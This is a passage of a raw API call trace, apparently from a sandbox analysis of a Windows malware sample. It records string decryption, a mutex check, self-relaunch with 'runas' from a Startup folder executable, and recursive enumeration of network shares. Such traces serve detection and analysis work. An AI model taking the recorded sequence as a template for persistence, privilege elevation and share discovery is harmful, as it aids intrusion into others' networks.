hHeap=0x1db0000) returned 1 [0232.294] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0232.295] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0232.295] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0232.295] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0232.295] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0232.295] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0232.295] CryptDestroyKey (hKey=0x29c020) returned 1 [0232.295] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0232.296] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0232.296] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0232.296] CloseHandle (hObject=0x1c0) returned 1 [0232.296] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0232.296] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 Thread: id = 92 os_tid = 0x5f8 [0103.902] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x1db1470 [0103.902] CryptImportKey (in: hProv=0x254d70, pbData=0x213fac8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x213fb30 | out: phKey=0x213fb30*=0x257648) returned 1 [0103.902] CryptSetKeyParam (hKey=0x257648, dwParam=0x1, pbData=0x213fb18, dwFlags=0x0) returned 1 [0103.902] CryptDecrypt (in: hKey=0x257648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db1470, pdwDataLen=0x213fae4 | out: pbData=0x1db1470, pdwDataLen=0x213fae4) returned 1 [0103.903] CryptDestroyKey (hKey=0x257648) returned 1 [0103.903] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20a) returned 0x1db1488 [0103.903] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x50) returned 0x1db16a0 [0103.903] CryptImportKey (in: hProv=0x254d70, pbData=0x213faa4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x213fb0c | out: phKey=0x213fb0c*=0x257648) returned 1 [0103.903] CryptSetKeyParam (hKey=0x257648, dwParam=0x1, pbData=0x213faf4, dwFlags=0x0) returned 1 [0103.903] CryptDecrypt (in: hKey=0x257648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16a0, pdwDataLen=0x213fac0 | out: pbData=0x1db16a0, pdwDataLen=0x213fac0) returned 1 [0103.903] CryptDestroyKey (hKey=0x257648) returned 1 [0103.903] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76180000 [0103.903] GetProcAddress (hModule=0x76180000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x761ad650 [0103.903] Wow64DisableWow64FsRedirection (in: OldValue=0x213fb54 | out: OldValue=0x213fb54*=0x0) returned 1 [0103.903] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16a0 | out: hHeap=0x1db0000) returned 1 [0103.903] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1db1488, nSize=0x104 | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe")) returned 0x45 [0103.903] ShellExecuteExW (in: pExecInfo=0x213fafc*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x213fafc*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0123.921] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x50) returned 0x1db9af0 [0123.921] CryptImportKey (in: hProv=0x254d70, pbData=0x213fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x213fb18 | out: phKey=0x213fb18*=0x29c5a0) returned 1 [0123.921] CryptSetKeyParam (hKey=0x29c5a0, dwParam=0x1, pbData=0x213fb00, dwFlags=0x0) returned 1 [0123.921] CryptDecrypt (in: hKey=0x29c5a0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9af0, pdwDataLen=0x213facc | out: pbData=0x1db9af0, pdwDataLen=0x213facc) returned 1 [0123.921] CryptDestroyKey (hKey=0x29c5a0) returned 1 [0123.921] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76180000 [0123.921] GetProcAddress (hModule=0x76180000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x761ad668 [0123.921] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0123.922] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9af0 | out: hHeap=0x1db0000) returned 1 [0123.922] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1488 | out: hHeap=0x1db0000) returned 1 [0123.922] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1470 | out: hHeap=0x1db0000) returned 1 Thread: id = 93 os_tid = 0x61c Thread: id = 94 os_tid = 0x654 Thread: id = 95 os_tid = 0x658 Thread: id = 96 os_tid = 0x66c Thread: id = 97 os_tid = 0x71c Thread: id = 98 os_tid = 0x720 [0109.110] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x21a) returned 0x3017a80 [0109.110] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x28) returned 0x3016da8 [0109.110] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x23c [0109.110] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x240 [0109.110] GetComputerNameW (in: lpBuffer=0x3017a90, nSize=0x348fb68 | out: lpBuffer="XDUWTFONO", nSize=0x348fb68) returned 1 [0109.110] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x26) returned 0x1db5748 [0109.110] GetLastError () returned 0xcb [0109.110] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x214) returned 0x3017ca8 [0109.111] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76180000 [0109.111] GetCurrentThreadId () returned 0x720 [0109.111] SetLastError (dwErrCode=0xcb) [0109.111] GetLastError () returned 0xcb [0109.111] SetLastError (dwErrCode=0xcb) [0109.111] GetLastError () returned 0xcb [0109.111] SetLastError (dwErrCode=0xcb) [0109.111] GetLastError () returned 0xcb [0109.111] SetLastError (dwErrCode=0xcb) [0109.111] GetLastError () returned 0xcb [0109.111] SetLastError (dwErrCode=0xcb) [0109.111] GetLastError () returned 0xcb [0109.111] SetLastError (dwErrCode=0xcb) [0109.111] GetLastError () returned 0xcb [0109.111] SetLastError (dwErrCode=0xcb) [0109.111] GetLastError () returned 0xcb [0109.112] SetLastError (dwErrCode=0xcb) [0109.112] GetLastError () returned 0xcb [0109.112] SetLastError (dwErrCode=0xcb) [0109.112] GetLastError () returned 0xcb [0109.112] SetLastError (dwErrCode=0xcb) [0109.112] GetLastError () returned 0xcb [0109.112] SetLastError (dwErrCode=0xcb) [0109.112] GetLastError () returned 0xcb [0109.112] SetLastError (dwErrCode=0xcb) [0109.112] GetLastError () returned 0xcb [0109.112] SetLastError (dwErrCode=0xcb) [0109.112] GetLastError () returned 0xcb [0109.112] SetLastError (dwErrCode=0xcb) [0109.112] GetLastError () returned 0xcb [0109.112] SetLastError (dwErrCode=0xcb) [0109.112] GetLastError () returned 0xcb [0109.112] SetLastError (dwErrCode=0xcb) [0109.112] GetLastError () returned 0xcb [0109.112] SetLastError (dwErrCode=0xcb) [0109.112] GetLastError () returned 0xcb [0109.112] SetLastError (dwErrCode=0xcb) [0109.112] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x3017ec8 [0109.113] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x301bed0 [0109.113] WNetOpenEnumW (in: dwScope=0x1, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x348fb2c | out: lphEnum=0x348fb2c*=0x2922e8) returned 0x0 [0112.714] WNetEnumResourceW (in: hEnum=0x2922e8, lpcCount=0x348fb34, lpBuffer=0x3017ec8, lpBufferSize=0x348fb24 | out: lpcCount=0x348fb34, lpBuffer=0x3017ec8, lpBufferSize=0x348fb24) returned 0x103 [0112.715] WNetCloseEnum (hEnum=0x2922e8) returned 0x0 [0112.715] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3017ec8 | out: hHeap=0x1db0000) returned 1 [0112.715] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x301bed0 | out: hHeap=0x1db0000) returned 1 [0112.715] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x309bf10 [0112.715] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3017ec8 [0112.715] WNetOpenEnumW (in: dwScope=0x4, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x348fb14 | out: lphEnum=0x348fb14*=0x2a67e8) returned 0x0 [0112.715] WNetEnumResourceW (in: hEnum=0x2a67e8, lpcCount=0x348fb1c, lpBuffer=0x309bf10, lpBufferSize=0x348fb0c | out: lpcCount=0x348fb1c, lpBuffer=0x309bf10, lpBufferSize=0x348fb0c) returned 0x103 [0112.715] WNetCloseEnum (hEnum=0x2a67e8) returned 0x0 [0112.716] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0112.716] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3017ec8 | out: hHeap=0x1db0000) returned 1 [0112.716] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x309bf10 [0112.716] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3017ec8 [0112.716] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x348fafc | out: lphEnum=0x348fafc*=0x2922e8) returned 0x0 [0126.245] WNetEnumResourceW (in: hEnum=0x2922e8, lpcCount=0x348fb04, lpBuffer=0x309bf10, lpBufferSize=0x348faf4 | out: lpcCount=0x348fb04, lpBuffer=0x309bf10, lpBufferSize=0x348faf4) returned 0x0 [0126.245] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x4030008 [0126.245] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3f90048 [0126.245] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x309bf10, lphEnum=0x348fabc | out: lphEnum=0x348fabc*=0x28eaf8) returned 0x0 [0143.247] WNetEnumResourceW (in: hEnum=0x28eaf8, lpcCount=0x348fac4, lpBuffer=0x4030008, lpBufferSize=0x348fab4 | out: lpcCount=0x348fac4, lpBuffer=0x4030008, lpBufferSize=0x348fab4) returned 0x0 [0143.247] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x4034010 [0143.247] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3fa0050 [0143.247] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x4030008, lphEnum=0x348fa7c | out: lphEnum=0x348fa7c*=0x2b8900) returned 0x0 [0159.187] WNetEnumResourceW (in: hEnum=0x2b8900, lpcCount=0x348fa84, lpBuffer=0x4034010, lpBufferSize=0x348fa74 | out: lpcCount=0x348fa84, lpBuffer=0x4034010, lpBufferSize=0x348fa74) returned 0x0 [0159.187] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x4038018 [0159.187] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x309ff18 [0159.187] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x4034010, lphEnum=0x348fa3c | out: lphEnum=0x348fa3c*=0x261148) returned 0x0 [0171.702] WNetEnumResourceW (in: hEnum=0x261148, lpcCount=0x348fa44, lpBuffer=0x4038018, lpBufferSize=0x348fa34 | out: lpcCount=0x348fa44, lpBuffer=0x4038018, lpBufferSize=0x348fa34) returned 0x0 [0171.702] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x403c020 [0171.702] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x30aff20 [0171.702] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x4038018, lphEnum=0x348f9fc | out: lphEnum=0x348f9fc*=0x2a1850) returned 0x0 [0181.935] WNetEnumResourceW (in: hEnum=0x2a1850, lpcCount=0x348fa04, lpBuffer=0x403c020, lpBufferSize=0x348f9f4 | out: lpcCount=0x348fa04, lpBuffer=0x403c020, lpBufferSize=0x348f9f4) returned 0x0 [0181.935] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x30bff28 [0181.935] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x30c3f30 [0181.935] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x403c020, lphEnum=0x348f9bc | out: lphEnum=0x348f9bc*=0x28d130) returned 0x0 [0191.503] WNetEnumResourceW (in: hEnum=0x28d130, lpcCount=0x348f9c4, lpBuffer=0x30bff28, lpBufferSize=0x348f9b4 | out: lpcCount=0x348f9c4, lpBuffer=0x30bff28, lpBufferSize=0x348f9b4) returned 0x0 [0191.503] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x30d3f38 [0191.503] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x30d7f40 [0191.503] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x30bff28, lphEnum=0x348f97c | out: lphEnum=0x348f97c*=0x28d1e0) returned 0x0 [0191.505] WNetEnumResourceW (in: hEnum=0x28d1e0, lpcCount=0x348f984, lpBuffer=0x30d3f38, lpBufferSize=0x348f974 | out: lpcCount=0x348f984, lpBuffer=0x30d3f38, lpBufferSize=0x348f974) returned 0x0 [0191.505] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x30e7f48 [0191.505] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x30ebf50 [0191.505] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x30d3f38, lphEnum=0x348f93c | out: lphEnum=0x348f93c*=0x28d238) returned 0x0 [0191.506] WNetEnumResourceW (in: hEnum=0x28d238, lpcCount=0x348f944, lpBuffer=0x30e7f48, lpBufferSize=0x348f934 | out: lpcCount=0x348f944, lpBuffer=0x30e7f48, lpBufferSize=0x348f934) returned 0x0 [0191.507] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x30fbf58 [0191.507] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3027ed0 [0191.507] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x30e7f48, lphEnum=0x348f8fc | out: lphEnum=0x348f8fc*=0x28d290) returned 0x0 [0191.508] WNetEnumResourceW (in: hEnum=0x28d290, lpcCount=0x348f904, lpBuffer=0x30fbf58, lpBufferSize=0x348f8f4 | out: lpcCount=0x348f904, lpBuffer=0x30fbf58, lpBufferSize=0x348f8f4) returned 0x0 [0191.508] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x30fff60 [0191.508] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3037ed8 [0191.508] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x30fbf58, lphEnum=0x348f8bc | out: lphEnum=0x348f8bc*=0x28d2e8) returned 0x0 [0191.510] WNetEnumResourceW (in: hEnum=0x28d2e8, lpcCount=0x348f8c4, lpBuffer=0x30fff60, lpBufferSize=0x348f8b4 | out: lpcCount=0x348f8c4, lpBuffer=0x30fff60, lpBufferSize=0x348f8b4) returned 0x0 [0191.510] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x3103f68 [0191.510] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3047ee0 [0191.510] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x30fff60, lphEnum=0x348f87c | out: lphEnum=0x348f87c*=0x28d340) returned 0x0 [0191.512] WNetEnumResourceW (in: hEnum=0x28d340, lpcCount=0x348f884, lpBuffer=0x3103f68, lpBufferSize=0x348f874 | out: lpcCount=0x348f884, lpBuffer=0x3103f68, lpBufferSize=0x348f874) returned 0x0 [0191.512] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x3057ee8 [0191.512] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x305bef0 [0191.512] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x3103f68, lphEnum=0x348f83c | out: lphEnum=0x348f83c*=0x28d398) returned 0x0 [0191.514] WNetEnumResourceW (in: hEnum=0x28d398, lpcCount=0x348f844, lpBuffer=0x3057ee8, lpBufferSize=0x348f834 | out: lpcCount=0x348f844, lpBuffer=0x3057ee8, lpBufferSize=0x348f834) returned 0x0 [0191.514] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x306bef8 [0191.514] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x306ff00 [0191.514] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x3057ee8, lphEnum=0x348f7fc | out: lphEnum=0x348f7fc*=0x28d3f0) returned 0x0 [0191.515] WNetEnumResourceW (in: hEnum=0x28d3f0, lpcCount=0x348f804, lpBuffer=0x306bef8, lpBufferSize=0x348f7f4 | out: lpcCount=0x348f804, lpBuffer=0x306bef8, lpBufferSize=0x348f7f4) returned 0x0 [0191.515] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x307ff08 [0191.515] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3083f10 [0191.515] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x306bef8, lphEnum=0x348f7bc | out: lphEnum=0x348f7bc*=0x28d448) returned 0x0 [0191.517] WNetEnumResourceW (in: hEnum=0x28d448, lpcCount=0x348f7c4, lpBuffer=0x307ff08, lpBufferSize=0x348f7b4 | out: lpcCount=0x348f7c4, lpBuffer=0x307ff08, lpBufferSize=0x348f7b4) returned 0x0 [0191.517] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x3093f18 [0191.517] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3fb0058 [0191.519] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x307ff08, lphEnum=0x348f77c | out: lphEnum=0x348f77c*=0x28d4a0) returned 0x0 [0191.521] WNetEnumResourceW (in: hEnum=0x28d4a0, lpcCount=0x348f784, lpBuffer=0x3093f18, lpBufferSize=0x348f774 | out: lpcCount=0x348f784, lpBuffer=0x3093f18, lpBufferSize=0x348f774) returned 0x0 [0191.521] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x3107f70 [0191.521] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3fc0060 [0191.521] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x3093f18, lphEnum=0x348f73c | out: lphEnum=0x348f73c*=0x28d4f8) returned 0x0 [0191.523] WNetEnumResourceW (in: hEnum=0x28d4f8, lpcCount=0x348f744, lpBuffer=0x3107f70, lpBufferSize=0x348f734 | out: lpcCount=0x348f744, lpBuffer=0x3107f70, lpBufferSize=0x348f734) returned 0x0 [0191.523] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x310bf78 [0191.523] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3fd0068 [0191.524] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x3107f70, lphEnum=0x348f6fc | out: lphEnum=0x348f6fc*=0x28d550) returned 0x0 [0191.525] WNetEnumResourceW (in: hEnum=0x28d550, lpcCount=0x348f704, lpBuffer=0x310bf78, lpBufferSize=0x348f6f4 | out: lpcCount=0x348f704, lpBuffer=0x310bf78, lpBufferSize=0x348f6f4) returned 0x0 [0191.525] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x3fe0070 [0191.525] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3fe4078 [0191.526] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x310bf78, lphEnum=0x348f6bc | out: lphEnum=0x348f6bc*=0x28d5a8) returned 0x0 [0191.528] WNetEnumResourceW (in: hEnum=0x28d5a8, lpcCount=0x348f6c4, lpBuffer=0x3fe0070, lpBufferSize=0x348f6b4 | out: lpcCount=0x348f6c4, lpBuffer=0x3fe0070, lpBufferSize=0x348f6b4) returned 0x0 [0191.528] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x3ff4080 [0191.528] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3ff8088 [0191.528] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x3fe0070, lphEnum=0x348f67c | out: lphEnum=0x348f67c*=0x28d600) returned 0x0 [0191.530] WNetEnumResourceW (in: hEnum=0x28d600, lpcCount=0x348f684, lpBuffer=0x3ff4080, lpBufferSize=0x348f674 | out: lpcCount=0x348f684, lpBuffer=0x3ff4080, lpBufferSize=0x348f674) returned 0x0 [0191.530] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x4008090 [0191.530] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x400c098 [0191.531] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x3ff4080, lphEnum=0x348f63c | out: lphEnum=0x348f63c*=0x28d658) returned 0x0 [0191.532] WNetEnumResourceW (in: hEnum=0x28d658, lpcCount=0x348f644, lpBuffer=0x4008090, lpBufferSize=0x348f634 | out: lpcCount=0x348f644, lpBuffer=0x4008090, lpBufferSize=0x348f634) returned 0x0 [0191.532] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x401c0a0 [0191.532] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x4040028 [0191.533] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x4008090, lphEnum=0x348f5fc | out: lphEnum=0x348f5fc*=0x28d6b0) returned 0x0 [0191.534] WNetEnumResourceW (in: hEnum=0x28d6b0, lpcCount=0x348f604, lpBuffer=0x401c0a0, lpBufferSize=0x348f5f4 | out: lpcCount=0x348f604, lpBuffer=0x401c0a0, lpBufferSize=0x348f5f4) returned 0x0 [0191.534] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x40200a8 [0191.535] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x4050030 [0191.535] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x401c0a0, lphEnum=0x348f5bc | out: lphEnum=0x348f5bc*=0x28d708) returned 0x0 [0191.537] WNetEnumResourceW (in: hEnum=0x28d708, lpcCount=0x348f5c4, lpBuffer=0x40200a8, lpBufferSize=0x348f5b4 | out: lpcCount=0x348f5c4, lpBuffer=0x40200a8, lpBufferSize=0x348f5b4) returned 0x0 [0191.537] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x40240b0 [0191.537] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x4060038 [0191.537] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x40200a8, lphEnum=0x348f57c | out: lphEnum=0x348f57c*=0x28d760) returned 0x0 [0191.539] WNetEnumResourceW (in: hEnum=0x28d760, lpcCount=0x348f584, lpBuffer=0x40240b0, lpBufferSize=0x348f574 | out: lpcCount=0x348f584, lpBuffer=0x40240b0, lpBufferSize=0x348f574) returned 0x0 [0191.539] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x40280b8 [0191.540] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x4070040 [0191.540] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x40240b0, lphEnum=0x348f53c | out: lphEnum=0x348f53c*=0x28d7b8) returned 0x0 [0191.541] WNetEnumResourceW (in: hEnum=0x28d7b8, lpcCount=0x348f544, lpBuffer=0x40280b8, lpBufferSize=0x348f534 | out: lpcCount=0x348f544, lpBuffer=0x40280b8, lpBufferSize=0x348f534) returned 0x0 [0191.542] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x4080048 [0191.542] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x4084050 [0191.542] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x40280b8, lphEnum=0x348f4fc | out: lphEnum=0x348f4fc*=0x28d810) returned 0x0 [0191.543] WNetEnumResourceW (in: hEnum=0x28d810, lpcCount=0x348f504, lpBuffer=0x4080048, lpBufferSize=0x348f4f4 | out: lpcCount=0x348f504, lpBuffer=0x4080048, lpBufferSize=0x348f4f4) returned 0x0 [0191.544] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x4094058 [0191.544] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x4098060 [0191.544] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x4080048, lphEnum=0x348f4bc | out: lphEnum=0x348f4bc*=0x28d868) returned 0x0 [0191.546] WNetEnumResourceW (in: hEnum=0x28d868, lpcCount=0x348f4c4, lpBuffer=0x4094058, lpBufferSize=0x348f4b4 | out: lpcCount=0x348f4c4, lpBuffer=0x4094058, lpBufferSize=0x348f4b4) returned 0x0 [0191.546] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x40a8068 [0191.546] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x40ac070 [0191.546] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x4094058, lphEnum=0x348f47c | out: lphEnum=0x348f47c*=0x28d8c0) returned 0x0 [0191.557] WNetEnumResourceW (in: hEnum=0x28d8c0, lpcCount=0x348f484, lpBuffer=0x40a8068, lpBufferSize=0x348f474 | out: lpcCount=0x348f484, 